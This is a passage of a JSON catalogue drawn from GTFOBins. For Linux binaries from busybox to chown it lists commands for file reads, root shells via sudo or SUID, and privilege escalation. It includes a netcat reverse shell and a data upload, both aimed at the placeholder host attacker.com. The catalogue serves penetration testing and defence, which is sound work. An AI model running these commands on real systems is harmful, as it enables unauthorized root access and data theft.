installation","aliases":[]},{"id":"gtfo:busybox:inherit:1:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:inherit:1:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"inherit ← cat","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["inherit","from:cat"],"command":"busybox cat","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:reverse-shell:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:reverse-shell:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"busybox nc -e /bin/sh attacker.com 12345","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:upload:0:sudo","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:busybox:upload:0:unprivileged","toolId":"gtfo:busybox","toolName":"busybox","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"busybox httpd -f -p 12345 -h .","description":"This serves files in the local folder via an HTTP server.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/busybox/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:byebug:inherit:0:sudo","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/byebug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:byebug:inherit:0:unprivileged","toolId":"gtfo:byebug","toolName":"byebug","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"byebug --no-stop /path/to/script.rb","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/byebug/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:sudo","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:suid","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:bzip2:file-read:0:unprivileged","toolId":"gtfo:bzip2","toolName":"bzip2","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bzip2 -c /path/to/input-file | bzip2 -d","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bzip2/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:sudo","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:suid","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cabal:shell:0:unprivileged","toolId":"gtfo:cabal","toolName":"cabal","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cabal exec --project-file=/dev/null -- /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cabal/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:sudo","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:suid","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cancel:upload:0:unprivileged","toolId":"gtfo:cancel","toolName":"cancel","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"cancel -h attacker.com:12345 -u DATA","description":"Data is sent as a POST request along with other content.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cancel/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:sudo","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:suid","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"capsh --gid=0 --uid=0 --","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:capsh:shell:0:unprivileged","toolId":"gtfo:capsh","toolName":"capsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"capsh --","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/capsh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cargo:inherit:0:sudo","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cargo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cargo:inherit:0:unprivileged","toolId":"gtfo:cargo","toolName":"cargo","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"cargo help doc","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cargo/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:sudo","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:suid","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cat:file-read:0:unprivileged","toolId":"gtfo:cat","toolName":"cat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"cat /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cdist:shell:0:sudo","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/cdist/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:cdist:shell:0:unprivileged","toolId":"gtfo:cdist","toolName":"cdist","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cdist shell -s /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/cdist/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:certbot:shell:0:sudo","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/certbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:certbot:shell:0:unprivileged","toolId":"gtfo:certbot","toolName":"certbot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"certbot certonly -n -d x --standalone --dry-run --agree-tos --email x --logs-dir . --work-dir . --config-dir . --pre-hook '/bin/sh 1>&0 2>&0'","description":"This needs a writable directory, replace `.` if needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/certbot/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chattr:privilege-escalation:0:sudo","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chattr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chattr:privilege-escalation:0:suid","toolId":"gtfo:chattr","toolName":"chattr","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chattr +i /path/to/input-file","description":"Make the target file immutable.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chattr/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_by_ssh:shell:0:sudo","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_by_ssh:shell:0:unprivileged","toolId":"gtfo:check_by_ssh","toolName":"check_by_ssh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"check_by_ssh -o \"ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)\" -H localhost -C x","description":"The shell will only last 10 seconds.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_by_ssh/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_cups:file-read:0:sudo","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_cups/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_cups:file-read:0:unprivileged","toolId":"gtfo:check_cups","toolName":"check_cups","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_cups --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_cups/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-read:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-read:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_log -F /path/to/input-file -O /dev/stdout","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-write:0:sudo","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_log:file-write:0:unprivileged","toolId":"gtfo:check_log","toolName":"check_log","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"check_log -F /path/to/input-file -O /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_log/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_memory:file-read:0:sudo","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_memory/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_memory:file-read:0:unprivileged","toolId":"gtfo:check_memory","toolName":"check_memory","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_memory --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_memory/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_raid:file-read:0:sudo","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_raid/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_raid:file-read:0:unprivileged","toolId":"gtfo:check_raid","toolName":"check_raid","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_raid --extra-opts=@/path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_raid/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_ssl_cert:shell:0:sudo","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_ssl_cert:shell:0:unprivileged","toolId":"gtfo:check_ssl_cert","toolName":"check_ssl_cert","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\ncheck_ssl_cert --grep-bin /path/to/temp-file -H x","description":"The shell will be invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_ssl_cert/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_statusfile:file-read:0:sudo","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:check_statusfile:file-read:0:unprivileged","toolId":"gtfo:check_statusfile","toolName":"check_statusfile","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"check_statusfile /path/to/input-file","description":"The read file content is limited to the first line.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/check_statusfile/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chmod:privilege-escalation:0:sudo","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chmod/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chmod:privilege-escalation:0:suid","toolId":"gtfo:chmod","toolName":"chmod","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chmod 6777 /path/to/input-file","description":"This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/chmod/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:sudo","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:suid","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"choom -n 0 -- /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:choom:shell:0:unprivileged","toolId":"gtfo:choom","toolName":"choom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"choom -n 0 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/choom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:chown:privilege-escalation:0:sudo","toolId":"gtfo:chown","toolName":"chown","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"chown $(id -un):$(id -gn) /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/chown/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 